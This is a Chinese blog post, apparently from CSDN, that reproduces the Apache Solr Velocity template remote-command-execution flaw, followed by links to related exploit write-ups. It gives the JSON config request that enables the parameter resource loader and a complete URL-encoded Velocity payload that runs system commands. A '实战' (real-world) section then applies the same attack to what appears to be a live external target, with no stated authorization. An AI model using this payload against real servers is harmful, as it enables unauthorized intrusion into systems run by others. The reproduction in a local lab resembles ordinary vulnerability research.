Apache Solr远程命令执行漏洞复现+实战

最新推荐文章于 2024-09-20 19:31:23 发布
最新推荐文章于 2024-09-20 19:31:23 发布
阅读量1.8k 收藏
点赞数
分类专栏: Web安全 文章标签: apache solr 命令执行 实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cj_Allen/article/details/107491298
版权

前言:

Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

漏洞原理:

该漏洞的产生是由于两方面的原因:

  1. 当攻击者可以直接访问Solr控制台时,可以通过发送类似/节点名/config的POST请求对该节点的配置文件做更改。
  2. Apache Solr默认集成VelocityResponseWriter插件,在该插件的初始化参数中的params.resource.loader.enabled这个选项是用来控制是否允许参数资源加载器在Solr请求参数中指定模版,默认设置是false。当设置params.resource.loader.enabled为true时,将允许用户通过设置请求中的参数来指定相关资源的加载,这也就意味着攻击者可以通过构造一个具有威胁的攻击请求,在服务器上进行命令执行。

影响版本:

  • 包括且不限于8.2.0(最新版本)
  • 5.4.1/5.5.0
  • 6.6.1/6.6.3
  • 7.0.1/7.1.0/7.2.1/7.3.0/7.4.0/7.5.0/7.7.1/7.7.2
  • 8.1.0/8.1.1/8.2.0

漏洞复现:

windows环境+Solr
Solr下载地址:http://archive.apache.org/dist/lucene/solr/7.7.2/solr-7.7.2.zip
第一步:下载好Solr环境后,解压,进入到C:\Users\Administrator\Desktop\solr-7.7.2\bin目录中。
在该目录中打开cmd,输入命令

solr start

出现如图表示启动成功。
在这里插入图片描述
访问本机ip地址+端口8983 如图表示启动成功。
在这里插入图片描述
第二步:添加Core Selector查看集合,该漏洞利用前提条件是攻击者需要知道Solr服务中Core的名称才能执行攻击

在这里插入图片描述:此时直接添加是无法进行添加的,需要将C:\Users\Administrator\Desktop\solr-7.7.2\server\solr\configsets\_default目录下的conf文件夹复制到C:\Users\Administrator\Desktop\solr-7.7.2\server\solr\jimolang下。
在这里插入图片描述在这里插入图片描述
第三步:添加Core Selector,添加成功。
在这里插入图片描述
第四步:通过burp抓包修改请求为POST,修改/solr/jimolang/config配置文件。开启params.resource.loader.enabled

windows下踩坑情况,由于默认请求是get请求,当修改为post请求时需要添加参数体来开启params.resource.loader.enabled但是默认的请求类型是application/x-www-form-urlencoded此时如果直接提交是失败的,如下图所示:

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

在这里插入图片描述修改Content-Type:application/json后成功。(到了这一步已经成功开启params.resource.loader.enabled)为true
在这里插入图片描述
第五步:使用exp执行命令whoami

/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

在这里插入图片描述

实战:

访问目标地址:
在这里插入图片描述
burp抓包修改请求包为POST,并开启params.resource.loader.enabled为true,如图成功开启。
在这里插入图片描述

命令执行:whoami

在这里插入图片描述

Mrzheng77
关注
专栏目录
Apache Solr远程命令执行漏洞复现 (CVE-2019-0193,docker 搭建)
suqiban7253的博客
03-14 301
这里写自定义目录标题0x00漏洞简介0x01 漏洞概述0x02影响范围0x03环境搭建0x04漏洞复现0x05 遇到的问题0x06参考 0x00漏洞简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 0x01 漏洞概述 该漏洞的产生是由于两方面的原因: 当攻击者可以直接访问Solr控制台时,可以通过发送类似/节
漏洞研究》Apache Log4j2 远程代码执行漏洞_apache log4j2远程代码执行漏洞
2301_76225520的博客
04-18 1118
以及 LDAP即轻量级目录访问协议都是名称服务,不同的是 LDAP是一个协议,是和 HTTP 一样是通用的,而不止局限于 JAVA.比如用户对象可以有用户名、密码、邮件地址、角色等属性,计算机对象可以有IP地址、MAC地址、操作系统版本等属性。四个系列:< v1.14.2, < v1.13.5, < v1.12.7, < v1.11.6。而用户可以通过目录服务,针对打印机需求,根据分辨率等属性进行搜索获取符合条件的打印机对象。在名称服务中根据打印机名称获取打印机对象,并进行打印操作。
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
weixin_44047654的博客
02-20 1074
Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
CVE-2017-12629-Apache Solr远程代码执行漏洞分析
最新发布
旺仔Sec&blog
09-20 1226
Apache Solr 是一个流行的开源企业搜索平台,广泛应用于各种企业级应用和网站中。2017 年,该漏洞被发现并公布,引起了广泛关注。 Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE),二者可以连接
Apache Solr 远程命令执行漏洞(CVE-2017-12629)复现
HEAVEN569的博客
06-21 1345
Apache Solr 远程命令执行漏洞(CVE-2017-12629)复现
CVE-2019-0193漏洞复现Apache Solr 远程命令执行漏洞复现
m0_58687645的博客
12-23 1470
0X00漏洞简介 CVE-2019-0193是一个存在于Apache solr搜索引擎中的命令执行漏洞 0X01漏洞原因 Apache solr 是一款开源的搜索服务器并且使用java语言开发;主要的工作方式:用户通过http请求像搜索引擎发出索引条件,solr对条件进行分词 处理,根据分词结果查找索引,继而找到文档   在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患,在apache solr < 8.2.0版本之前DIH配置
Apache Solr 远程命令执行
m0_63241485的博客
08-28 1016
命令执行漏洞
CVE-2019-0192 Apache Solr远程反序列化代码执行漏洞
yyj1781572的博客
04-05 683
Apache Solr是一个开源的搜索服务器。具有高度可靠、可伸缩和容错的,提供分布式索引、复制和负载平衡查询、自动故障转移和恢复、集中配置等功能。
漏洞研究》Apache Log4j2 远程代码执行漏洞
1
11-04 1795
Apache Log4j2 组件存在远程代码执行漏洞(CVE-2021-44228),该漏洞是由于 Apache Log4j2 某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
2301_79054215的博客
04-13 1117
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测
K8哥哥
12-18 4735
title: 〖工具〗log4Shell核弹级漏洞复现&Ladon批量检测 comments: true toc: true categories: exp tags: Log4j2 abbrlink: log4shell date: 2021-12-16 19:24:00 img: https://img-blog.csdnimg.cn/20210117163103552.jpg 漏洞简介 Apache Log4j2是一款优秀的Java日志框架。近日,漏洞银行安全团队注意到了Ap.
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
声明 此处提供的漏洞检测方法,文件等内容,均仅限于安全从业者在获得法律授权的情况下使用,目的是检测已授权的服务器的安全性。安全从业者遵守法律规定,禁止在没有得到授权的情况下做任何突破检测。 简介 理论上可以使用各种不同类型的数据源来构造 Exploit1使用数据源的类型为URLDataSource Exploit2使用的数据源类型为ContentStreamDataSource 检测突破-Exploit1 Exploit1使用数据源的类型为URLDataSource 优点:结果回显支持对Solr低版本的检测 缺点:需要出网 步骤1 构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!)可以直接使用这个 文档demo.xml即URLDataSource类型的数据源一份无害的正常XML文档 文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动网络服务器托
Apache solr 远程代码执行漏洞(CVE-2019-0193)复现
weixin_42558965的博客
01-12 830
0x00:复现环境 靶机:CentOS7、docker、vulhub-master 攻击机:windows10 0x01:复现过程(数据包提交) 在/vulhub-master/solr/CVE-2019-0193/下启动镜像: docker-compose up -d 然后攻击机访问靶机IP:8983(默认端口号) 如图访问成功: 随后运行命令: docker-compose exec solr bash bin/solr create_core -c test -d example/example-
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
黑白的博客
11-22 670
声明 好好学习,天天向上 漏洞描述 Apache solr 是一款开源的搜索服务器并且使用java语言开发;主要的工作方式:用户通过http请求像搜索引擎发出索引条件,solr对条件进行分词 处理,根据分词结果查找索引,继而找到文档 在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患,在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制 影响范围 Apache solr < 8.2.0 复现
solr漏洞合集
weixin_46626737的博客
07-02 1006
在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)漏洞版本:Apache Solr 5.0.0 ~8.3.1。漏洞版本:Apache Solr < 8.2.0。3.solr远程代码执行(CVE-2017-12629)5.solr的XXE漏洞(CVE-2017-12629)2.solr远程代码执行(CVE-2019-0193)漏洞版本:Apache Solr < 7.1。漏洞版本:Apache Solr < 7.1。
solr 远程命令执行 (CVE-2019-17558)
m0_49025459的博客
12-06 587
漏洞描述 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。 影响范围 Apache Solr 5.0.0 ~8.3.1 漏洞利用 (1)默认情况下params.resource.loader.enabled配置未打开,无法使用自定义模板。可以先通过如下API获取所有的核心在vulhub中核心就是demo通过下边API获取所有内核名称 第一步:访问特定url启用配置par
Apache Solr漏洞总结(比较全面的哦)
热门推荐
yangbz123的博客
06-11 1万+
目录框架概述Wiki百科百度百科漏洞列表1.远程命令执行RCE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案2.远程命令执行XXE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案3.任意文件读取AND命令执行(CVE-2019-17558)漏洞详情漏洞复现3.1代码执行3.2任意文件读取影响版本修复方案4.远程命令执行漏洞(CVE-2019-0192)漏洞详情漏洞复现影响版本修复方案5.远程命令执行漏洞(CVE-2019-0193)漏洞详情漏洞复现影响版本修复方案6.未授权
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
午夜安全
11-24 1575
Apache Solr 远程命令执行漏洞(CVE-2019-0193) 声明:本篇文章仅限用于学习信息安全技术,请勿用于非法途径! 1.漏洞描述 2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。当solr开启了DataImportHandler功能,该模块中的DIH配置都可以通过外部请求dataconfig参数进行修改,DIH可包含...
Solr Shiro Log4j2 命令执行--文件读取--反序列化--身份权限绕过--命令执行
weixin_74985952的博客
10-10 276
Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离(即MVC设计模式)。Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞Solr系统上执行任意代码。
Apache Solr 4实战宝典:100+优化技巧
Apache Solr 4 Cookbook》是一本由Rafał Kuć编著的专业技术书籍,针对的是Apache Solr 4版本的深入指南。这本书是英文版,旨在提供超过100个实用的"菜谱",帮助读者提升Apache Solr的性能、增强其可靠性,并优化...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值